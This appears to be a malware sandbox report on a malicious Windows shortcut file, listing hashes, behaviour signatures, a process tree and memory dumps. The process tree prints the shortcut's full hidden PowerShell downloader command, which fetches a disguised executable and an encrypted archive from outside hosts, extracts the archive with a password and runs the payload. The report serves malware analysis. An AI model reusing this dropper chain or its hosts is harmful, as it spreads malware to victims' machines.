Overview

overview

8

Static

static

1

63a4d3c0ac...18.lnk

windows7-x64

8

63a4d3c0ac...18.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    122s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    21-05-2024 14:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    63a4d3c0acd0de4b6071f5825efa3b18_JaffaCakes118.lnk

  • Size

    3KB

  • MD5

    63a4d3c0acd0de4b6071f5825efa3b18

  • SHA1

    015e4cefa50a7c0a8927a7d79959bc7bd4122e44

  • SHA256

    f4c0411d2221e59e9e206309199bdb53f203bf8ca6b32511dcf280e7abe643aa

  • SHA512

    0a9fae189e86275c74438a7d001ed8c0b081ee1a7637d08c009e5e1d2c630f68438e6f97a26d7e229050e4a853f3de59127a05284e4d0a009a0e36a1cda889d5

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\63a4d3c0acd0de4b6071f5825efa3b18_JaffaCakes118.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -WindowStyle Hidden Import-Module BitsTransfer; New-Item -ItemType directory -Path "C:\Users\Admin\AppData\Local\twain_32" Start-BitsTransfer -Source "http://onthesummit.pl/wp-includes/random_compat/7z.png", "http://verificacaopagamentoclientes.com//teste/web/C263156FC65FF0068E85BD66F8AB4DF55.7z" -Destination "C:\Users\Admin\AppData\Local\twain_32\bc3efab342f72c6e7e5d9b61136edb03.exe", "C:\Users\Admin\AppData\Local\twain_32\C263156FC65FF0068E85BD66F8AB4DF55.7z"; $extract = "cmd.exe /c C:\Users\Admin\AppData\Local\twain_32\bc3efab342f72c6e7e5d9b61136edb03.exe x C:\Users\Admin\AppData\Local\twain_32\C263156FC65FF0068E85BD66F8AB4DF55.7z -oC:\Users\Admin\AppData\Local\twain_32 -r -pF665D85EF164FF77DC75EE0035392B44242A28292867D1"; Invoke-Expression -Command $extract; Start-BitsTransfer -Source "http://lupindesign.pl/images/web/note.php"; $start = "cmd.exe /c C:\Users\Admin\AppData\Local\twain_32\twunk_16.exe C:\Users\Admin\AppData\Local\twain_32\xwizard.dtd"; Invoke-Expression -Command $start;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2088
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\twain_32\bc3efab342f72c6e7e5d9b61136edb03.exe x C:\Users\Admin\AppData\Local\twain_32\C263156FC65FF0068E85BD66F8AB4DF55.7z -oC:\Users\Admin\AppData\Local\twain_32 -r -pF665D85EF164FF77DC75EE0035392B44242A28292867D1
        3⤵
          PID:2456
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c C:\Users\Admin\AppData\Local\twain_32\twunk_16.exe C:\Users\Admin\AppData\Local\twain_32\xwizard.dtd
          3⤵
            PID:2816

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/2088-38-0x000007FEF5FAE000-0x000007FEF5FAF000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2088-39-0x000000001B620000-0x000000001B902000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2088-41-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2088-40-0x0000000001F40000-0x0000000001F48000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2088-43-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2088-42-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2088-44-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2088-46-0x0000000002D00000-0x0000000002D22000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2088-45-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download

      • memory/2088-47-0x0000000002930000-0x0000000002942000-memory.dmp

        Filesize

        72KB

        Download

      • memory/2088-48-0x000007FEF5CF0000-0x000007FEF668D000-memory.dmp

        Filesize

        9.6MB

        Download